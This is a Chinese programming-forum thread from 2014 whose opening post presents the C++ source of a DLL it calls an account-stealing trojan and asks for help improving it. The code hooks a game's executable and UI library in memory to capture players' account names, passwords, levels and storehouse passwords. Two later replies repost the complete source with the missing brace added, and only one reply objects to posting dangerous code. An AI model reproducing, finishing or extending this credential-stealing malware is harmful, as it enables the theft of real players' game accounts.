
这就是盗号木马的编程,请大神修改一下

楼主
发表于 2014-8-30 09:54:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
5啊哈币
/** main.cpp **/
#include <windows.h>
// Analysis note: source of a DLL that, once loaded inside the game process,
// patches the game's code in memory so that the account name, password,
// character level and storehouse password are copied into the buffers below.
// Byte pattern searched for in "game.exe" to find the login patch site.
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
// 6-byte patch templates: 0xE9 (x86 JMP rel32), a 4-byte displacement filled
// in at run time, then 0x90 (NOP).
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
// Byte pattern searched for in "ui_cegui.dll" to find the level patch site.
BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
// Byte pattern searched for in "ui_cegui.dll"; the storehouse patch site is
// 0x43 bytes past the match (see HookStroe).
BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
// Original six bytes at the storehouse patch site, saved so they can be put back.
BYTE oldStoreCode[6]={0};
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
// Base address of the private copy of ui_cegui.dll made by CmpFlag.
DWORD ui_cegui;
// Addresses the three handlers jump to when they finish.
void *lpUserRet=NULL;
void *lpGradeRet=NULL;
void *lpStoreRet=NULL;
// Fixed 40-byte buffers that receive the captured strings.
char user[40];
char pass[40];
char storePassWord[40];
// Captured level value.
DWORD dwGrade;
// Address of the storehouse patch site in the live module; 0 while unset.
DWORD stroePath=0;
// Forward declarations ("Stroe" is the author's spelling of "Store").
void _stdcall StroeUnhook();
void _stdcall HookStroe();
// Finds the byte pattern `flag` (length `len`) in the loaded module `moduleName`.
// The module image is first copied into a newly allocated executable region and
// the copy is scanned. On a match, *lpRet receives the address of the match
// inside the copy and the return value is the same offset in the live module;
// *lpModule receives the base of the copy. Returns 0 if the module is not
// loaded or the pattern is not found. The copy is not freed in this function.
// Defender's view: a private PAGE_EXECUTE_READWRITE allocation holding a
// byte-for-byte copy of a loaded image is a memory-forensics indicator.
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
// Message text reads "error getting module".
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
// Reads the DWORD at offset 0x50 from the PE header located via the DWORD at
// module offset 0x3c (e_lfanew); in a 32-bit image that field is SizeOfImage.
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
*lpModule=(DWORD)newModule;
memcpy(newModule,(void*)hModule,imageSize);
// Byte-by-byte scan of the copy for the pattern.
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)((DWORD)newModule+i);
if(memcmp(buff,flag,len)==0)
{

   *lpRet=(void*)buff;
   return i+(DWORD)hModule;

}

}
return 0;
}
// Same pattern search as CmpFlag, but scans memory starting at the
// caller-supplied base `newModule` instead of making a new copy. The scan
// length is the SizeOfImage of the live module `moduleName`. On a match,
// *lpRet receives the address inside the scanned region and the return value
// is the same offset in the live module; returns 0 otherwise.
DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
// Message text reads "error getting module".
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
// SizeOfImage read from the PE header of the live module (see e_lfanew at 0x3c).
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)(newModule+i);
if(memcmp(buff,flag,len)==0)
{

   *lpRet=(void*)buff;
   return i+(DWORD)hModule;

}

}
return 0;
}
// Copies the two strings handed over by the login handler into the global
// `user` and `pass` buffers. strcpy is unbounded and both destinations are
// 40 bytes.
void _stdcall GetUserBuff(char *userName,char *passWord)
{
strcpy(user,userName);
strcpy(pass,passWord);
return;
}
// Handler reached from the patched login site in game.exe. Declared naked, so
// the compiler emits no prologue/epilogue. It preserves eax, passes ecx and the
// dword at [ebp+0xC] to GetUserBuff (ecx is pushed last and so becomes
// userName), calls StroeUnhook, restores eax and jumps to lpUserRet, which
// CmpFlag set to the matched instructions inside the private module copy.
__declspec(naked)void GetUserAndPass()
{
_asm
{
push eax;
mov eax,dword ptr ss:[ebp+0xC];
push eax;
push ecx;
call GetUserBuff;
call StroeUnhook;
pop eax;
jmp [lpUserRet];
}
}
// Stores the value passed by the level handler in the global dwGrade.
void _stdcall GetGradeDword(DWORD grade)
{
dwGrade=grade;
return;
}
// Handler reached from the patched level site in ui_cegui.dll. Saves all
// general registers, passes ebx to GetGradeDword, then calls HookStroe to
// install the storehouse patch, restores the registers and jumps to lpGradeRet.
__declspec(naked)void GetGrade()
{
_asm
{
pushad;
push ebx;
call GetGradeDword;
call HookStroe;
popad;
jmp [lpGradeRet];
}
}
// Restores the six original bytes at the storehouse patch site (stroePath)
// from oldStoreCode. Does nothing when stroePath is 0. Page protection is
// switched with VirtualProtect before and after the write.
void _stdcall StroeUnhook()
{
if(stroePath==0)
return;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,oldStoreCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
// Copies the storehouse password into storePassWord (unbounded strcpy into a
// 40-byte buffer), formats the four captured values into a 256-byte stack
// buffer and shows them in a message box. In this listing the values are only
// displayed locally; no file or network output appears.
void _stdcall GetStoreBuff(char *storePass)
{
strcpy(storePassWord,storePass);
char data[256];
// Format labels read: user name / password / level / storehouse password.
wsprintf(data,"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n",user,pass,dwGrade,storePassWord);
::MessageBox(NULL,data,"ok",0);
}
// Handler reached from the patched storehouse site in ui_cegui.dll. Saves all
// general registers, passes ecx to GetStoreBuff, removes the storehouse patch
// via StroeUnhook, restores the registers and jumps to lpStoreRet.
__declspec(naked)void GetStore()
{
_asm
{
pushad;
push ecx;
call GetStoreBuff;
call StroeUnhook;
popad;
jmp [lpStoreRet];

}
}
// Installs the storehouse patch: locates storeCode in ui_cegui.dll by scanning
// the private copy whose base is in ui_cegui, moves 0x43 bytes past the match,
// saves the six original bytes and overwrites them with a JMP rel32 to GetStore.
// Defender's view: after this runs, the code bytes of ui_cegui.dll in memory
// differ from the file on disk at the patch site, which an integrity
// comparison of loaded code against the on-disk image can reveal.
void _stdcall HookStroe()
{
stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui);
if(stroePath==0)
return ;
// Both the live-module address and the resume address are moved 0x43 bytes on.
stroePath=stroePath+0x43;
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43);
// rel32 displacement is measured from the end of the 5-byte JMP.
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5);
*(DWORD*)(&storeJmpCode[1])=jmpAddress;
memcpy(oldStoreCode,(BYTE*)stroePath,6);
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,storeJmpCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
// Installs the level patch: locates gradeCode in ui_cegui.dll through CmpFlag
// (which also stores the base of the private module copy in ui_cegui) and
// overwrites six bytes at the match with a JMP rel32 to GetGrade. The original
// bytes at this site are not saved.
void HookGrade()
{
DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui);
if(passPath==0)
return ;
// rel32 displacement is measured from the end of the 5-byte JMP.
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5);
*(DWORD*)(&gradeJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,gradeJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
// Installs the login patch: locates userCode in game.exe through CmpFlag and
// overwrites six bytes at the match with a JMP rel32 to GetUserAndPass. The
// base of the module copy is received in a local and not used afterwards; the
// original bytes at this site are not saved.
void HookUserAndPass()
{
DWORD hModule;
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule);
if(passPath==0)
return ;
// rel32 displacement is measured from the end of the 5-byte JMP.
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5);
*(DWORD*)(&userJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,userJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
// Thread entry point: installs the login patch and the level patch.
// lpParam is unused. Always returns 0.
DWORD WINAPI Thread(LPVOID lpParam)
{
HookUserAndPass();
HookGrade();
return 0;
}
// DLL entry point. On process attach it starts a thread that runs Thread();
// the handle returned by CreateThread is not stored. Always returns TRUE.
// As posted, the closing brace of this function is missing.
BOOL APIENTRY DllMain( HANDLE hModule,
       DWORD ul_reason_for_call,
       LPVOID lpReserved
       )
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
   DWORD ThreadId;
   CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId);
   break;
}

default:break;
}
return TRUE;



沙发
发表于 2014-8-30 14:02:58 | 只看该作者
我是大神?不敢当!你才是大神!你写的我看都看不懂!牛
板凳
发表于 2014-8-30 14:20:01 | 只看该作者
最后少了一个大括号
地板
发表于 2014-8-30 17:57:58 | 只看该作者
不要发危险代码上来,谢谢合作
5#
发表于 2014-8-30 19:10:45 | 只看该作者
rosynirvana 发表于 2014-8-30 17:57
不要发危险代码上来,谢谢合作

                                      
6#
发表于 2014-9-7 11:52:18 | 只看该作者
[mw_shl_code=c,true]/** main.cpp **/
#include <windows.h>
// Analysis note: source of a DLL that, once loaded inside the game process,
// patches the game's code in memory so that the account name, password,
// character level and storehouse password are copied into the buffers below.
// Byte pattern searched for in "game.exe" to find the login patch site.
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
// 6-byte patch templates: 0xE9 (x86 JMP rel32), a 4-byte displacement filled
// in at run time, then 0x90 (NOP).
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
// Byte pattern searched for in "ui_cegui.dll" to find the level patch site.
BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
// Byte pattern searched for in "ui_cegui.dll"; the storehouse patch site is
// 0x43 bytes past the match (see HookStroe).
BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
// Original six bytes at the storehouse patch site, saved so they can be put back.
BYTE oldStoreCode[6]={0};
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
// Base address of the private copy of ui_cegui.dll made by CmpFlag.
DWORD ui_cegui;
// Addresses the three handlers jump to when they finish.
void *lpUserRet=NULL;
void *lpGradeRet=NULL;
void *lpStoreRet=NULL;
// Fixed 40-byte buffers that receive the captured strings.
char user[40];
char pass[40];
char storePassWord[40];
// Captured level value.
DWORD dwGrade;
// Address of the storehouse patch site in the live module; 0 while unset.
DWORD stroePath=0;
// Forward declarations ("Stroe" is the author's spelling of "Store").
void _stdcall StroeUnhook();
void _stdcall HookStroe();
// Finds the byte pattern `flag` (length `len`) in the loaded module `moduleName`.
// The module image is first copied into a newly allocated executable region and
// the copy is scanned. On a match, *lpRet receives the address of the match
// inside the copy and the return value is the same offset in the live module;
// *lpModule receives the base of the copy. Returns 0 if the module is not
// loaded or the pattern is not found. The copy is not freed in this function.
// Defender's view: a private PAGE_EXECUTE_READWRITE allocation holding a
// byte-for-byte copy of a loaded image is a memory-forensics indicator.
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
// Message text reads "error getting module".
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
// Reads the DWORD at offset 0x50 from the PE header located via the DWORD at
// module offset 0x3c (e_lfanew); in a 32-bit image that field is SizeOfImage.
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
*lpModule=(DWORD)newModule;
memcpy(newModule,(void*)hModule,imageSize);
// Byte-by-byte scan of the copy for the pattern.
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)((DWORD)newModule+i);
if(memcmp(buff,flag,len)==0)
{

   *lpRet=(void*)buff;
   return i+(DWORD)hModule;

}

}
return 0;
}
// Same pattern search as CmpFlag, but scans memory starting at the
// caller-supplied base `newModule` instead of making a new copy. The scan
// length is the SizeOfImage of the live module `moduleName`. On a match,
// *lpRet receives the address inside the scanned region and the return value
// is the same offset in the live module; returns 0 otherwise.
DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
// Message text reads "error getting module".
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
// SizeOfImage read from the PE header of the live module (see e_lfanew at 0x3c).
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)(newModule+i);
if(memcmp(buff,flag,len)==0)
{

   *lpRet=(void*)buff;
   return i+(DWORD)hModule;

}

}
return 0;
}
// Copies the two strings handed over by the login handler into the global
// `user` and `pass` buffers. strcpy is unbounded and both destinations are
// 40 bytes.
void _stdcall GetUserBuff(char *userName,char *passWord)
{
strcpy(user,userName);
strcpy(pass,passWord);
return;
}
// Handler reached from the patched login site in game.exe. Declared naked, so
// the compiler emits no prologue/epilogue. It preserves eax, passes ecx and the
// dword at [ebp+0xC] to GetUserBuff (ecx is pushed last and so becomes
// userName), calls StroeUnhook, restores eax and jumps to lpUserRet, which
// CmpFlag set to the matched instructions inside the private module copy.
__declspec(naked)void GetUserAndPass()
{
_asm
{
push eax;
mov eax,dword ptr ss:[ebp+0xC];
push eax;
push ecx;
call GetUserBuff;
call StroeUnhook;
pop eax;
jmp [lpUserRet];
}
}
// Stores the value passed by the level handler in the global dwGrade.
void _stdcall GetGradeDword(DWORD grade)
{
dwGrade=grade;
return;
}
// Handler reached from the patched level site in ui_cegui.dll. Saves all
// general registers, passes ebx to GetGradeDword, then calls HookStroe to
// install the storehouse patch, restores the registers and jumps to lpGradeRet.
__declspec(naked)void GetGrade()
{
_asm
{
pushad;
push ebx;
call GetGradeDword;
call HookStroe;
popad;
jmp [lpGradeRet];
}
}
// Restores the six original bytes at the storehouse patch site (stroePath)
// from oldStoreCode. Does nothing when stroePath is 0. Page protection is
// switched with VirtualProtect before and after the write.
void _stdcall StroeUnhook()
{
if(stroePath==0)
return;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,oldStoreCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
// Copies the storehouse password into storePassWord (unbounded strcpy into a
// 40-byte buffer), formats the four captured values into a 256-byte stack
// buffer and shows them in a message box. In this listing the values are only
// displayed locally; no file or network output appears.
void _stdcall GetStoreBuff(char *storePass)
{
strcpy(storePassWord,storePass);
char data[256];
// Format labels read: user name / password / level / storehouse password.
wsprintf(data,"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n",user,pass,dwGrade,storePassWord);
::MessageBox(NULL,data,"ok",0);
}
// Handler reached from the patched storehouse site in ui_cegui.dll. Saves all
// general registers, passes ecx to GetStoreBuff, removes the storehouse patch
// via StroeUnhook, restores the registers and jumps to lpStoreRet.
__declspec(naked)void GetStore()
{
_asm
{
pushad;
push ecx;
call GetStoreBuff;
call StroeUnhook;
popad;
jmp [lpStoreRet];

}
}
// Installs the storehouse patch: locates storeCode in ui_cegui.dll by scanning
// the private copy whose base is in ui_cegui, moves 0x43 bytes past the match,
// saves the six original bytes and overwrites them with a JMP rel32 to GetStore.
// Defender's view: after this runs, the code bytes of ui_cegui.dll in memory
// differ from the file on disk at the patch site, which an integrity
// comparison of loaded code against the on-disk image can reveal.
void _stdcall HookStroe()
{
stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui);
if(stroePath==0)
return ;
// Both the live-module address and the resume address are moved 0x43 bytes on.
stroePath=stroePath+0x43;
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43);
// rel32 displacement is measured from the end of the 5-byte JMP.
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5);
*(DWORD*)(&storeJmpCode[1])=jmpAddress;
memcpy(oldStoreCode,(BYTE*)stroePath,6);
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,storeJmpCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
// Installs the level patch: locates gradeCode in ui_cegui.dll through CmpFlag
// (which also stores the base of the private module copy in ui_cegui) and
// overwrites six bytes at the match with a JMP rel32 to GetGrade. The original
// bytes at this site are not saved.
void HookGrade()
{
DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui);
if(passPath==0)
return ;
// rel32 displacement is measured from the end of the 5-byte JMP.
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5);
*(DWORD*)(&gradeJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,gradeJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
// Installs the login patch: locates userCode in game.exe through CmpFlag and
// overwrites six bytes at the match with a JMP rel32 to GetUserAndPass. The
// base of the module copy is received in a local and not used afterwards; the
// original bytes at this site are not saved.
void HookUserAndPass()
{
DWORD hModule;
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule);
if(passPath==0)
return ;
// rel32 displacement is measured from the end of the 5-byte JMP.
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5);
*(DWORD*)(&userJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,userJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
// Thread entry point: installs the login patch and the level patch.
// lpParam is unused. Always returns 0.
DWORD WINAPI Thread(LPVOID lpParam)
{
HookUserAndPass();
HookGrade();
return 0;
}
// DLL entry point. On process attach it starts a thread that runs Thread();
// the handle returned by CreateThread is not stored. Always returns TRUE.
BOOL APIENTRY DllMain( HANDLE hModule,
       DWORD ul_reason_for_call,
       LPVOID lpReserved
       )
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
   DWORD ThreadId;
   CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId);
   break;
}

default:break;
}
return TRUE;
}[/mw_shl_code]
7#
发表于 2014-9-7 11:52:58 | 只看该作者
[mw_shl_code=c,true]/** main.cpp **/
#include <windows.h>
// Analysis note: source of a DLL that, once loaded inside the game process,
// patches the game's code in memory so that the account name, password,
// character level and storehouse password are copied into the buffers below.
// Byte pattern searched for in "game.exe" to find the login patch site.
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
// 6-byte patch templates: 0xE9 (x86 JMP rel32), a 4-byte displacement filled
// in at run time, then 0x90 (NOP).
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
// Byte pattern searched for in "ui_cegui.dll" to find the level patch site.
BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
// Byte pattern searched for in "ui_cegui.dll"; the storehouse patch site is
// 0x43 bytes past the match (see HookStroe).
BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
// Original six bytes at the storehouse patch site, saved so they can be put back.
BYTE oldStoreCode[6]={0};
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
// Base address of the private copy of ui_cegui.dll made by CmpFlag.
DWORD ui_cegui;
// Addresses the three handlers jump to when they finish.
void *lpUserRet=NULL;
void *lpGradeRet=NULL;
void *lpStoreRet=NULL;
// Fixed 40-byte buffers that receive the captured strings.
char user[40];
char pass[40];
char storePassWord[40];
// Captured level value.
DWORD dwGrade;
// Address of the storehouse patch site in the live module; 0 while unset.
DWORD stroePath=0;
// Forward declarations ("Stroe" is the author's spelling of "Store").
void _stdcall StroeUnhook();
void _stdcall HookStroe();
// Finds the byte pattern `flag` (length `len`) in the loaded module `moduleName`.
// The module image is first copied into a newly allocated executable region and
// the copy is scanned. On a match, *lpRet receives the address of the match
// inside the copy and the return value is the same offset in the live module;
// *lpModule receives the base of the copy. Returns 0 if the module is not
// loaded or the pattern is not found. The copy is not freed in this function.
// Defender's view: a private PAGE_EXECUTE_READWRITE allocation holding a
// byte-for-byte copy of a loaded image is a memory-forensics indicator.
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
// Message text reads "error getting module".
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
// Reads the DWORD at offset 0x50 from the PE header located via the DWORD at
// module offset 0x3c (e_lfanew); in a 32-bit image that field is SizeOfImage.
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
*lpModule=(DWORD)newModule;
memcpy(newModule,(void*)hModule,imageSize);
// Byte-by-byte scan of the copy for the pattern.
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)((DWORD)newModule+i);
if(memcmp(buff,flag,len)==0)
{

   *lpRet=(void*)buff;
   return i+(DWORD)hModule;

}

}
return 0;
}
// Same pattern search as CmpFlag, but scans memory starting at the
// caller-supplied base `newModule` instead of making a new copy. The scan
// length is the SizeOfImage of the live module `moduleName`. On a match,
// *lpRet receives the address inside the scanned region and the return value
// is the same offset in the live module; returns 0 otherwise.
DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
// Message text reads "error getting module".
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
// SizeOfImage read from the PE header of the live module (see e_lfanew at 0x3c).
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)(newModule+i);
if(memcmp(buff,flag,len)==0)
{

   *lpRet=(void*)buff;
   return i+(DWORD)hModule;

}

}
return 0;
}
// Copies the two strings handed over by the login handler into the global
// `user` and `pass` buffers. strcpy is unbounded and both destinations are
// 40 bytes.
void _stdcall GetUserBuff(char *userName,char *passWord)
{
strcpy(user,userName);
strcpy(pass,passWord);
return;
}
// Handler reached from the patched login site in game.exe. Declared naked, so
// the compiler emits no prologue/epilogue. It preserves eax, passes ecx and the
// dword at [ebp+0xC] to GetUserBuff (ecx is pushed last and so becomes
// userName), calls StroeUnhook, restores eax and jumps to lpUserRet, which
// CmpFlag set to the matched instructions inside the private module copy.
__declspec(naked)void GetUserAndPass()
{
_asm
{
push eax;
mov eax,dword ptr ss:[ebp+0xC];
push eax;
push ecx;
call GetUserBuff;
call StroeUnhook;
pop eax;
jmp [lpUserRet];
}
}
// Stores the value passed by the level handler in the global dwGrade.
void _stdcall GetGradeDword(DWORD grade)
{
dwGrade=grade;
return;
}
// Handler reached from the patched level site in ui_cegui.dll. Saves all
// general registers, passes ebx to GetGradeDword, then calls HookStroe to
// install the storehouse patch, restores the registers and jumps to lpGradeRet.
__declspec(naked)void GetGrade()
{
_asm
{
pushad;
push ebx;
call GetGradeDword;
call HookStroe;
popad;
jmp [lpGradeRet];
}
}
// Restores the six original bytes at the storehouse patch site (stroePath)
// from oldStoreCode. Does nothing when stroePath is 0. Page protection is
// switched with VirtualProtect before and after the write.
void _stdcall StroeUnhook()
{
if(stroePath==0)
return;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,oldStoreCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
// Copies the storehouse password into storePassWord (unbounded strcpy into a
// 40-byte buffer), formats the four captured values into a 256-byte stack
// buffer and shows them in a message box. In this listing the values are only
// displayed locally; no file or network output appears.
void _stdcall GetStoreBuff(char *storePass)
{
strcpy(storePassWord,storePass);
char data[256];
// Format labels read: user name / password / level / storehouse password.
wsprintf(data,"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n",user,pass,dwGrade,storePassWord);
::MessageBox(NULL,data,"ok",0);
}
// Handler reached from the patched storehouse site in ui_cegui.dll. Saves all
// general registers, passes ecx to GetStoreBuff, removes the storehouse patch
// via StroeUnhook, restores the registers and jumps to lpStoreRet.
__declspec(naked)void GetStore()
{
_asm
{
pushad;
push ecx;
call GetStoreBuff;
call StroeUnhook;
popad;
jmp [lpStoreRet];

}
}
// Installs the storehouse patch: locates storeCode in ui_cegui.dll by scanning
// the private copy whose base is in ui_cegui, moves 0x43 bytes past the match,
// saves the six original bytes and overwrites them with a JMP rel32 to GetStore.
// Defender's view: after this runs, the code bytes of ui_cegui.dll in memory
// differ from the file on disk at the patch site, which an integrity
// comparison of loaded code against the on-disk image can reveal.
void _stdcall HookStroe()
{
stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui);
if(stroePath==0)
return ;
// Both the live-module address and the resume address are moved 0x43 bytes on.
stroePath=stroePath+0x43;
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43);
// rel32 displacement is measured from the end of the 5-byte JMP.
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5);
*(DWORD*)(&storeJmpCode[1])=jmpAddress;
memcpy(oldStoreCode,(BYTE*)stroePath,6);
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,storeJmpCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
// Installs the level patch: locates gradeCode in ui_cegui.dll through CmpFlag
// (which also stores the base of the private module copy in ui_cegui) and
// overwrites six bytes at the match with a JMP rel32 to GetGrade. The original
// bytes at this site are not saved.
void HookGrade()
{
DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui);
if(passPath==0)
return ;
// rel32 displacement is measured from the end of the 5-byte JMP.
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5);
*(DWORD*)(&gradeJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,gradeJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
// Installs the login patch: locates userCode in game.exe through CmpFlag and
// overwrites six bytes at the match with a JMP rel32 to GetUserAndPass. The
// base of the module copy is received in a local and not used afterwards; the
// original bytes at this site are not saved.
void HookUserAndPass()
{
DWORD hModule;
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule);
if(passPath==0)
return ;
// rel32 displacement is measured from the end of the 5-byte JMP.
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5);
*(DWORD*)(&userJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,userJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
// Thread entry point: installs the login patch and the level patch.
// lpParam is unused. Always returns 0.
DWORD WINAPI Thread(LPVOID lpParam)
{
HookUserAndPass();
HookGrade();
return 0;
}
// DLL entry point. On process attach it starts a thread that runs Thread();
// the handle returned by CreateThread is not stored. Always returns TRUE.
BOOL APIENTRY DllMain( HANDLE hModule,
       DWORD ul_reason_for_call,
       LPVOID lpReserved
       )
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
   DWORD ThreadId;
   CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId);
   break;
}

default:break;
}
return TRUE;
}。[/mw_shl_code]
8#
发表于 2014-9-20 16:20:59 | 只看该作者
/tiao